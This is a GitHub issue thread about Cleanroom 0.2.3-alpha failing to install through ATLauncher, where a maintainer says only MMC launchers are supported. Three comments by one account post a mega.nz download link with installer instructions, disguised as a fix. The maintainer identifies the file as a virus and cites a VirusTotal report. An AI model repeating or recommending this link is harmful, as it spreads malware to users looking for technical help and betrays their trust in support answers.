### ISSUE TITLE
 java.lang.Exception: Failed to find loader version for 0.2.3-alpha

### ISSUE THREAD

**Issue by Levviata** [CleanroomMC/Cleanroom#192]
### Your CleanroomMC Discord Username

levviata

### Cleanroom Version

0.2.3-alpha

### Java Version

Java 21

### Graphics Card Vendor

NVidia

### Bug Report

I do not comprehend how to install Cleanroom on ATLauncher, do not see any other tutorials or issues about this, lend a hand please?

This issue happens when importing a zip file packaged from an MMC launcher to ATLauncher, no Cleanroom installed, why and how does this happen? Importing the packaged zip to the MMC launcher works fine and good.

[atlauncher.log](https://paste.atlauncher.com/view/c67816b2-9b42-44c1-81d4-6a459c3d4719)

### Mod List

Not relevant AFAIK

### MMC Instance Notes

None

### Final Checklist

- [X] I have searched the issues and haven't found a similar issue.
- [X] I have read the known incompatibilities and this is not related to one of those.
- [X] I have installed [Fugue](https://github.com/CleanroomMC/Fugue) and it does not fix this issue.
- [X] I am using experimental branch and have installed [Scalar](https://github.com/CleanroomMC/Scalar/releases/tag/2.11.1) and it does not fix this issue.
- [X] I am running a test build from Cleanroom Github Actions.  (Or, if I've compiled it myself I plan to fix the issue)

**Comment by kappa-maintainer** [comment]
We don't support non-MMC launchers, that's it
You may try to use the installer jar, but if you encounter any problem it's on your own

**Comment by Levviata** [comment]
Ahhhhh okay okay, I think it would be useful to tell people that the non-mmc launchers are not tested but thanks anyway!

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by kappa-maintainer** [comment]
Don't download the zip from that mega link, it was a virus
https://www.virustotal.com/gui/file/83248e7c2675805c366abe338975b6820b520a16b782849e4c029a355f5f46e5

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
